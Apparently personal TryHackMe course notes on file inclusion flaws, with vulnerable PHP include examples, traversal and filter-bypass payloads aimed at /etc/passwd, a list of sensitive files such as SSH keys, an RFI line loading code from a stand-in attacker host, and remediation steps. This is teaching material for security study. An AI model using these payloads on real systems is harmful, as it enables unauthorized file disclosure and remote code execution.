<!doctype html>
<html lang="en" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-Jr Penetration Tester/Introduction to Web Hacking/File Inclusion" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.2.0">
<title data-rh="true">File Inclusion | THM Notes</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:image" content="https://thm.pochacco.top/img/Pochacco-social-card.png"><meta data-rh="true" name="twitter:image" content="https://thm.pochacco.top/img/Pochacco-social-card.png"><meta data-rh="true" property="og:url" content="https://thm.pochacco.top/docs/Jr Penetration Tester/Introduction to Web Hacking/File Inclusion"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="File Inclusion | THM Notes"><meta data-rh="true" name="description" content="File inclusion vulnerabilities"><meta data-rh="true" property="og:description" content="File inclusion vulnerabilities"><link data-rh="true" rel="icon" href="/img/favicon.ico"><link data-rh="true" rel="canonical" href="https://thm.pochacco.top/docs/Jr Penetration Tester/Introduction to Web Hacking/File Inclusion"><link data-rh="true" rel="alternate" href="https://thm.pochacco.top/docs/Jr Penetration Tester/Introduction to Web Hacking/File Inclusion" hreflang="en"><link data-rh="true" rel="alternate" href="https://thm.pochacco.top/docs/Jr Penetration Tester/Introduction to Web Hacking/File Inclusion" hreflang="x-default"><link rel="stylesheet" href="/assets/css/styles.487c242f.css">
<script src="/assets/js/runtime~main.32f33024.js" defer="defer"></script>
<script src="/assets/js/main.7573ae7a.js" defer="defer"></script>
</head>
<body class="navigation-with-keyboard">
<script>!function(){function t(t){document.documentElement.setAttribute("data-theme",t)}var e=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return localStorage.getItem("theme")}catch(t){}}();t(null!==e?e:"light")}(),function(){try{const c=new URLSearchParams(window.location.search).entries();for(var[t,e]of c)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><nav aria-label="Main" class="navbar navbar--fixed-top"><div class="navbar__inner"><div class="navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/"><div class="navbar__logo"><img src="/img/logo.png" alt="PochaccoTop Logo" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/img/logo.png" alt="PochaccoTop Logo" class="themedComponent_mlkZ themedComponent--dark_xIcU"></div><b class="navbar__title text--truncate">TryHackMe Notes</b></a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/docs/Intro">TryHackme</a></div><div class="navbar__items navbar__items--right"><a href="https://index.pochacco.top/en/" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">Index<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a><a href="https://pochacco.top" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">MainSite<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a><a href="https://github.com/pikachu233666" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link header-github-link" aria-label="GitHub repository"></a><div class="toggle_vylO colorModeToggle_DEke"><button class="clean-btn toggleButton_gllP toggleButtonDisabled_aARS" type="button" disabled="" title="Switch between dark and light mode (currently light mode)" aria-label="Switch between dark and light mode (currently light mode)" aria-live="polite"><svg viewBox="0 0 24 24" width="24" height="24" class="lightToggleIcon_pyhR"><path fill="currentColor" d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" class="darkToggleIcon_wfgR"><path fill="currentColor" d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"></path></svg></button></div><div class="navbarSearchContainer_Bca1"></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="Scroll back to top" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd"><nav aria-label="Docs sidebar" class="menu thin-scrollbar menu_SIkG"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/docs/Intro">TryHackMe</a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Introduction to Cyber Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Pre Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Jr Penetration Tester</a></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Introduction to Cyber Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Pentesting/Pentesting Fundamentals">Introduction to Pentesting</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Authentication Bypass">Introduction to Web Hacking</a></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Authentication Bypass">Authentication Bypass</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Command Injection">Command Injection</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Content Discovery">Content Discovery</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Cross-site Scripting">Cross-site Scripting</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/File Inclusion">File Inclusion</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/IDOR">IDOR</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Intro to SSRF">Intro to SSRF</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/SQL Injection">SQL Injection</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Subdomain Enumeration">Subdomain Enumeration</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Walking An Application">Walking An Application</a></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Burp Suite/Extensions">Burp Suite</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Network Security/Active Reconnaissance">Network Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Vulnerability Research/Exploit Vulnerabilities">Vulnerability Research</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Metasploit/Exploitation">Metasploit</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation">Privilege Escalation</a></div></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Events/The Witch&#x27;s Cauldron">Events</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Others/Bash Scripting">Others</a></div></li></ul></nav></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="Breadcrumbs"><ul class="breadcrumbs" itemscope="" itemtype="https://schema.org/BreadcrumbList"><li class="breadcrumbs__item"><a aria-label="Home page" class="breadcrumbs__link" href="/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">Jr Penetration Tester</span><meta itemprop="position" content="1"></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">Introduction to Web Hacking</span><meta itemprop="position" content="2"></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link" itemprop="name">File Inclusion</span><meta itemprop="position" content="3"></li></ul></nav><div class="theme-doc-markdown markdown"><p>#Web</p>
<p>File inclusion vulnerabilities</p>
<ul>
<li>Local File Inclusion(LFI)</li>
<li>Remote File Inclusion(RFI)</li>
<li>directory traversal</li>
</ul>
<p>Query parameter strings attached to the URL that could be used to retrieve data or perform actions based on user input.
<img decoding="async" loading="lazy" alt="essential parts of a url" src="/assets/images/File_Inclusion_1-afea25518fe47e1a13ce468174b4b6a8.png" width="672" height="324" class="img_ev3q"></p>
<p>The main issue of this vulnerabilities is the poor input validation. It may happens leak data and even gain remote command execution(RCE).</p>
<h1>Path Traversal (Directory traversal)</h1>
<p>The attacker exploits this vulnerability by manipulating and  abusing the URL to locate and access the files and directories stored outside the application&#x27;s root directory.</p>
<p>It occurs when the user&#x27;s input passed to a function such as file_get_contents in PHP, and it have <strong>poor input validation or filter</strong>.</p>
<p>Path traversal attack(dot-dot-slash attack) using <code>../</code> which sending to the entry point such as <code>get.php?file=</code></p>
<p>Some common OS files:</p>
<table><thead><tr><th style="text-align:center"><strong>Locations</strong></th><th style="text-align:center"><strong>Description</strong></th></tr></thead><tbody><tr><td style="text-align:center">/etc/issue</td><td style="text-align:center">contains a message or system identification to be printed before the login prompt.</td></tr><tr><td style="text-align:center">/etc/profile</td><td style="text-align:center">controls system-wide default variables, such as Export variables, File creation mask (umask), Terminal types, Mail messages to indicate when new mail has arrived</td></tr><tr><td style="text-align:center">/proc/version</td><td style="text-align:center">specifies the version of the Linux kernel</td></tr><tr><td style="text-align:center">/etc/passwd</td><td style="text-align:center">has all registered user that has access to a system</td></tr><tr><td style="text-align:center">/etc/shadow</td><td style="text-align:center">contains information about the system&#x27;s users&#x27; passwords</td></tr><tr><td style="text-align:center">/root/.bash_history</td><td style="text-align:center">contains the history commands for root user</td></tr><tr><td style="text-align:center">/var/log/dmessage</td><td style="text-align:center">contains global system messages, including the messages that are logged during system startup</td></tr><tr><td style="text-align:center">/var/mail/root</td><td style="text-align:center">all emails for root user</td></tr><tr><td style="text-align:center">/root/.ssh/id_rsa</td><td style="text-align:center">Private SSH keys for a root or any known valid user on the server</td></tr><tr><td style="text-align:center">/var/log/apache2/access.log</td><td style="text-align:center">the accessed requests for Apache webserver</td></tr><tr><td style="text-align:center">C:\boot.ini</td><td style="text-align:center">contains the boot options for computers with BIOS firmware</td></tr></tbody></table>
<h1>Local File Inclusion (LFI)</h1>
<p>It happened when using PHP, ASP, JSP, Node.js.</p>
<p>In PHP, using function such as <code>include</code>, <code>require</code>, <code>include_once</code>, and <code>require_once</code> often contribute to LFI</p>
<p>Example:</p>
<ol>
<li>
<p>An application provides two languages (EN and AR)</p>
<div class="language-php codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-php codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">&lt;?PHP </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">    include($_GET[&quot;lang&quot;]);</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">?&gt;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>The PHP above uses a <code>GET</code> request via the URL parameter <code>lang</code> to include the file.</p>
<p>We can use <code>http://webapp.thm/get.php?file=/etc/passwd</code> as our payload.</p>
</li>
<li>
<p>In the following code, it specify the directory inside the function</p>
<div class="language-php codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-php codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">&lt;?PHP </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">	include(&quot;languages/&quot;. $_GET[&#x27;lang&#x27;]); </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">?&gt;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>The PHP above use <code>include</code> function to call PHP pages in the <code>languages</code> directory only via <code>lang</code> parameters.</p>
<p>We can use <code>http://webapp.thm/index.php?lang=../../../../etc/passwd</code> as our payload.</p>
</li>
<li>
<p>(BlackBox Test), we get a entry point<code>http://webapp.thm/index.php?lang=EN</code>, after we enter a invalid input, we get the error</p>
<div class="codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">Warning: include(languages/THM.php): failed to open stream: No such file or directory in /var/www/html/THM-4/index.php on line 12</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>it shows what the include function like<code>include(languages/THM.php);</code>, which add <code>.php</code> at the end of entry, and it show us the full web application directory is <code>/var/www/html/THM-4/</code></p>
<p>So we use <code>http://webapp.thm/index.php?lang=../../../../etc/passwd</code> as payload, but it shows the code below since the <code>include</code> function read the <code>.php</code> at the end</p>
<div class="codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">Warning: include(languages/../../../../../etc/passwd.php): failed to open stream: No such file or directory in /var/www/html/THM-4/index.php on line 12</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>Bypass it, we can use the NULL BYTE, which is <code>%00</code> or <code>0x00</code> in hex, it is an injection technique in URL-encoded.</p>
<p>NOTE: the <code>%00</code> trick is fixed in PHP5.3.4 and above.</p>
</li>
<li>
<p>it uses filter keywords, the <code>/etc/passwd</code> file is being filtered, two ways to bypass it:</p>
<p>using the NullByte <code>%00</code> or the current directory trick at the end of the keyword<code>/.</code></p>
<p><code>http://webapp.thm/index.php?lang=/etc/passwd/.</code></p>
<p><code>http://webapp.thm/index.php?lang=/etc/passwd%00</code></p>
</li>
<li>
<p>it uses input validation by filter some keywords</p>
<p>we use <code>http://webapp.thm/index.php?lang=../../../../etc/passwd</code> as payload, and get the error below</p>
<div class="codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">Warning: include(languages/etc/passwd): failed to open stream: No such file or directory in /var/www/html/THM-5/index.php on line 15</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>it replace <code>../</code> to empty string, to bypass it, we can use payload <code>....//....//....//....//....//etc/passwd</code></p>
<p><img decoding="async" loading="lazy" alt="how the payload work" src="/assets/images/File_Inclusion_2-e368ae403fce855b154d616b882f5e7c.png" width="1095" height="405" class="img_ev3q"></p>
</li>
<li>
<p>it forces the include to read from a defined directory, if the entry point is like <code>http://webapp.thm/index.php?lang=languages/EN.php</code> the payload should be <code>?lang=languages/../../../../../etc/passwd</code></p>
</li>
<li>
<p>To pass the filter, some times we can change GET method to POST method</p>
</li>
</ol>
<h1>Remote File Inclusion (RFI)</h1>
<p>It happened when the input allow attacker to inject an external URL into <code>include</code> function, one requirement is <code>allow_url_fopen</code> is on.</p>
<p>The consequence of RFI is:</p>
<ul>
<li>Remote Command Execute (RCE)</li>
<li>Sensitive Information Disclose</li>
<li>Cross-site Scripting (XSS)</li>
<li>Denial of Service (DoS)</li>
</ul>
<p>A external server where the attacker hosts malicious files must communicate with the application server.
<code>http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt</code></p>
<h1>Remediation</h1>
<p>To prevent the file inclusion</p>
<ul>
<li>Keep system, services and framework update</li>
<li>Turn off PHP errors to avoid reveal informations</li>
<li>A Web Application Firewall (WAF)</li>
<li>Disable some PHP features such as <code>allow_url_fopen</code> and <code>allow_url_input</code></li>
<li>Allow only protocols and PHP wrappers that are in need</li>
<li>Implement whitelisting for file names and locations as well as blacklisting</li>
</ul>
<h1>Steps for testing for LFI</h1>
<ol>
<li>Find an entry point that could be via GET, POST, COOKIE, or HTTP header values</li>
<li>Enter a valid input to see how the web server behaves.</li>
<li>Enter invalid inputs, including special characters and common file names.</li>
<li>Use either a browser address bar or a tool such as Burpsuite.</li>
<li>Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.</li>
<li>Understand the input validation and if there are any filters</li>
<li>Try the inject a valid entry to read sensitive files</li>
</ol></div></article><nav class="pagination-nav docusaurus-mt-lg" aria-label="Docs pages"><a class="pagination-nav__link pagination-nav__link--prev" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Cross-site Scripting"><div class="pagination-nav__sublabel">Previous</div><div class="pagination-nav__label">Cross-site Scripting</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/IDOR"><div class="pagination-nav__sublabel">Next</div><div class="pagination-nav__label">IDOR</div></a></nav></div></div></div></div></main></div></div></div><footer class="footer footer--dark"><div class="container container-fluid"><div class="footer__bottom text--center"><div class="footer__copyright">Copyright © 2024 Gabriel@pochacco.top</div></div></div></footer></div>
</body>
</html>